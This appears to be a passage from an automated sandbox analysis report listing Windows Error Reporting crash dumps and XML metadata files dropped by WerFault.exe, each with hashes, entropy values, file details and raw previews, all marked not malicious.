Preview:	MDMP..a..... .......x.f............T...............\............<..........T.......8...........T............,..............x...........d...............................................................................eJ..............GenuineIntel............T.......@...l.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5F48.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7055902795239297
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1C656YEIgSU9yEgmftnpBa89bd8sfp/m:R6lXJA656YE/SU9yEgmftbdPfs
MD5:	901395EC59138CDB1481AE7689441C40
SHA1:	03460D0AB3C4A9DFF6A7BB2BBB52C0E81081F1CB
SHA-256:	5CA5C5336D07965B9FB0C40DB72CD9202E46763436C28022BC061C800147B06B
SHA-512:	51F5D9C9725999799B013C7239A320E2E7D622B830DE92A46388AF614B29D42354DBF865369ECAB711F1FA97ED1F7AFF5C7FB66B6D16E851DAFAD960DD85240A
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER5FA7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.499296010221576
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYcYm8M4JBmCFHZ+q8YQUVVEkd:uIjfNI7aG7VEJBBjxVVEkd
MD5:	872D7791A5661DC32FF44301DEDFE2E9
SHA1:	BB4683B67BF8BA38B8EDD4A9206036B94DE1414C
SHA-256:	E80D19E604333F9D4B022E0EBD63B1AFF571923D6BC0759A207D5CCD76AC1A8A
SHA-512:	DD336EBD4E034B63D4BD7F5B3EA64CBA85B3E2B038810D0D1E008B997C083FB65A73F5710F74CBA38792D37EE432FEEB335A1A377FE6C1B391F30F7D88EED769
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER614B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:24 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	89316
Entropy (8bit):	2.0514076270017183
Encrypted:	false
SSDEEP:	384:2TrJCFVcUf02r9WTzn9cnpEepXMrp+E3KoB0JqqJTSmCA:2TrJCkUf0LTTmGeJ2+eK8qd
MD5:	B8BE77FD61E183F8618E7F452A3692B1
SHA1:	5D6D92FA006775C53B69AB03FE5165E5FF9122CF
SHA-256:	B7A8E06CCF16EED1487B495352F8D5B42DEF9B2921F691157150FF8C1332DE6F
SHA-512:	F6530E22FAB472A8B78A9D1B2041D8E32F5EAD457A37D3F98B0B396AA6E788262ECA43DC44141FF1B378C5923E786816E3B8BD6C320C094963DB06C4E7F19E9D
Malicious:	false
Preview:	MDMP..a..... .......x.f.........................................A..........T.......8...........T............-..\/......................................................................................................eJ......\ ......GenuineIntel............T.......@...l.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER61F8.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.706529833828387
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1u6Yr6YEIKSU9UZgmftnpB089bU8sfs8m:R6lXJs606YElSU9UZgmftpUPf+
MD5:	AC4356D939CD89B098FEAB8CAD42EAA9
SHA1:	9AACC65B5E3B60D5FF094B18B2494BE703183967
SHA-256:	C5FF6A25AB19CC531B480A6E6FA1B5F963709366D4C4A5D749D06B2D90FCC3EE
SHA-512:	265AE7844A91F5AB461B6AC0D71DBE103E0D76BF20E995AEC04BBE4615C0E996CB860C10170701CB82AB6DDB3C63C5487C44B00D3B7BABCFC9C9AF2EA488F9B8
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6247.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.501421245137021
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYyYm8M4JBmCFk+q8YQUVVEkd:uIjfNI7aG7VOJB8jxVVEkd
MD5:	18F4099D6F4264949E32F0015548A606
SHA1:	29B999881C5EE09BF3848C9BC319AE0969435542
SHA-256:	002BAD38A1685FF2DD63C33D176AE0F220A086B6296AB5CBF20E38010DF16037
SHA-512:	E288B222643025C4898A57FA7A6CE80B30D1AE931403F4126D543C377805A4D11CC73903512630D1D09764FCFBF453F2474F9957D3C5FA0719335856DD181AD3
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6429.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:25 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	88892
Entropy (8bit):	2.0626704067986443
Encrypted:	false
SSDEEP:	384:IrJBPUfY2zLhEgdepXMrp+E3Ko704M4lyaYUzEA:IrJBPUfY2PhleJ2+eK5Na0
MD5:	CDB61EBB8BE9F2F658CD763C61AF738B
SHA1:	53A4900DB35E4044FDBA179233B80DA3422F990F
SHA-256:	2CCB84146CB910A5FE2B40D0CBBCCFB5C6358D7568FACDB0DB7735F7CA7D2AA4
SHA-512:	32C6EC25476AB34552A4D79E8AF164E57715FA4B83E2A53B8C7CDC199FD7980F31F421F9DB5C5A6E0313053EB97ABB52F39E3D23613C9C77648E67D28425FFE4
Malicious:	false
Preview:	MDMP..a..... .......y.f.........................................A..........T.......8...........T............-...-......................................................................................................eJ......\ ......GenuineIntel............T.......@...l.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER64A7.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8352
Entropy (8bit):	3.7060844931450156
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1l61oe6YEIoSU9TZgmftnpBT89bU8sfF8m:R6lXJn6j6YEXSU9TZgmftcUPfb
MD5:	4E9F4317E6840BE3E55D0DD23B4E2EDA
SHA1:	63559BA899BB355A595802C463C6049CEED1EE35
SHA-256:	5B62171C85496D3F357B9F1E846194F6351693DB9DA6252D89539C40E2C8864B
SHA-512:	D811E3F067BCA58C7A473ABBFBA81198D3DF92F8D3455EB8C68C38B6FEEFB4068F3EE277E58F30EC85F9465542D6613EA03D920D565F447A0E7A148F0F5C7741
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER64E7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.502691956990503
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYovYm8M4JBmCFSm+q8YQUVVEkd:uIjfNI7aG7VUJBJjxVVEkd
MD5:	82C924B8F815BA2E30F2F2F2A0E5695F
SHA1:	D1EB0605E6964688B0FBA8CA6414C632534A33DE
SHA-256:	B882BD45543B52F3B19DAF22B775F530D1CE1995726435BB193C5FDA620F92D0
SHA-512:	71987FD7CA30E5AD697679BC9BB13E3FD8C318956F09366D65D3622AA3FDAB54656AF8746817153B55F6FABA401F72221D9FBD8FCA1911D98785E914CBC99FA0
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER67B3.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:26 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	38734
Entropy (8bit):	2.483772975953687
Encrypted:	false
SSDEEP:	192:iiXWuAvXozybP/IXu1Pl8ukOLXofw2ejgzKZEyG0zCw1PXahdZ3g9rR10h6EAgjs:RAgQ/X1PllUf2jgzKZqw1/CZynRA
MD5:	45B127A07AC6C2D96D571A6255390A38
SHA1:	C1F9EE87E147595EA0B3213513B3B48311C5BC3F
SHA-256:	94DB7D7F11A859201DBE0980D0168BB167943D573C704B172FA8F52385D8FF30
SHA-512:	502C34A3BC89E5BFD7A4B91489B608360210A2AE6C05474C5C509A82C79B829ED97041D267C097A58B9033F0CF7552F46C68B93211EC0853B483CE391FE1E50B
Malicious:	false
Preview:	MDMP..a..... .......z.f............4...........T...<.......T..../..........T.......8...........T...........(3..&d........... ..........\|"..............................................................................eJ.......#......GenuineIntel............T.......@...l.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER690C.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8360
Entropy (8bit):	3.7040158981899243
Encrypted:	false
SSDEEP:	192:R6l7wVeJ1m6IwO6YEILSU93egmfo4bHpD089bP8sfElm:R6lXJk6IwO6YE0SU93egmfowPPfL
MD5:	528EBF92F65D9BB9A2187DB59FFA0429
SHA1:	7533576783DDE61D12C6AE460C7A4FE8E0A0C876
SHA-256:	5EEF3407DEE310FCCBD3020492C7E5D0EC9BFD38F6BE99783F993D2BF89C7409
SHA-512:	A53BD34A3FE323F18ABB99446C77A76B07A714EB1EE4DD7447E979D5CF441081DBC868A1D7AFE277D5EE97ECAFFC8A413542BDBF19308701AC8533356FF0FE5F
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.4.6.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER693C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4623
Entropy (8bit):	4.49821096894316
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VY1Ym8M4JBmhOqFLVK+q8Yb2OyVVEkd:uIjfNI7aG7VdJBWXVKjyZVVEkd
MD5:	0D7ADDEDF67408DBE2347921C19ACB31
SHA1:	778AACAD72B418DE858B80A252D111D9A0BAA7E5
SHA-256:	D753FCF3E619809BFF962B0376C10124F739DD53A8CDD44D7CBB909A0BC6882C
SHA-512:	4D5D518BF4D750D7B9293371BAA504184CD4A39969A9C7B02F056ACC5D1104C331C765EDA6743A50FB68CE8516AEECFEE374C71AE723B0C9E48F37B75797E881
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9C60.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:40 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	52850
Entropy (8bit):	2.145335236191196
Encrypted:	false
SSDEEP:	192:cLXPJ5XHS2AyOLXw5cEEP1z68c0XKXOvJQbhrh6KIeDc0psnYogdxiIdfRVv1af7:CNS2ANc58P1z3XKJQKICp0mx/pKj
MD5:	32268BEACDC53DF114B4DCB4A5AB897D
SHA1:	1E3F1F5DD227CABF5699BB39761C18A94EDE6569
SHA-256:	F0771324D0C350737F55F290BB42A09952FFB62C752050813D688544EE56FBC7
SHA-512:	4917B989F0BBC2FD78CA0C1BBBFE6236A8B872E0A9EF7924297B021F31AE8E39D007B4910A923D4A6ED3E94B3B79FCB14443ED6F1DB91BF60D9E0FF04D720465
Malicious:	false
Preview:	MDMP..a..... .........f........................P...........t...*...........T.......8...........T...............Z.......................................................................................................eJ..............GenuineIntel............T.......,...z.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9CFD.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8338
Entropy (8bit):	3.70146429035947
Encrypted:	false
SSDEEP:	192:R6l7wVeJeIp6SU/XqTq6Y1E6AomgmfpnpBB89bfvsfB1m:R6lXJn6SU/qe6Ym6AomgmfpGfUfq
MD5:	26C5B87ADD407DC4701E76A59C9E2F0F
SHA1:	15158FBC2968E7CA62F3F7D62957A9817FDC0954
SHA-256:	5A66DC2EC003765492CD6802F31B458C3B5E3F33260FD65C366BEE7641FD93AE
SHA-512:	AD10D30986093657ED2AB74EE37064DB2655C194D5D5EBF2C3A21440B3718DF9980686E5C872CE08A15B684834CAA8F579DE15BB58492773C4C8DCE399A19F1B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.6.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9D3D.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4619
Entropy (8bit):	4.481903383961277
Encrypted:	false
SSDEEP:	48:cvIwWl8zszJg77aI9M3WpW8VYLYm8M4JhmCFh+q8CQF8gTa3d:uIjfNI7aG7V7Jhpl08gTa3d
MD5:	54949FF542817AB655E49DE7849E0D16
SHA1:	0D1146F688DA51656D32906658C9E7B20F65F35A
SHA-256:	303E768DFC5F3C0F2BDF1B66025144B25B7A46E2EEA2921DB04F2EBBCD480D17
SHA-512:	1319FC997E40F733405D07F39BB6F1446FAAB3779310F92C87918B6B307EB1818C82F64FD2EC8B1CEBAA43D568502BAAF1B7B010A658050029CE2F4EFB66EA10
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="437935" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

C:\ProgramData\Microsoft\Windows\WER\Temp\WERA077.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Aug 2 11:52:41 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	58838
Entropy (8bit):	2.162084720418863
Encrypted:	false
SSDEEP:	384:+N4Frhjc5itckWkIzEpoQKICp0ULrVU4iR:Awrhjc5itcPpo2QKZp0UapR
MD5:	F2DC649E7D6CFEBB5D74E02A8C7AD3BE
SHA1:	66414B547EDEDF75B8A732576053851B737AB111
SHA-256:	73F5C0C627C32B6B765DA403887422619FAD0842D89CCB5BDEC0A6E912430E51
SHA-512:	9F54B9705E079E8C445E8F5F1F3DC5CE764D49674789CABC3B166726B7A7EDB2ADF3BCBDAEFE58C5B09FA9C888035E6B6AD5A03465730BE2AFBE510F23954ABB
Malicious:	false
Preview:	MDMP..a..... .........f.........................................1..........T.......8...........T.......................................................................................................................eJ......<.......GenuineIntel............T.......,...z.f.............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

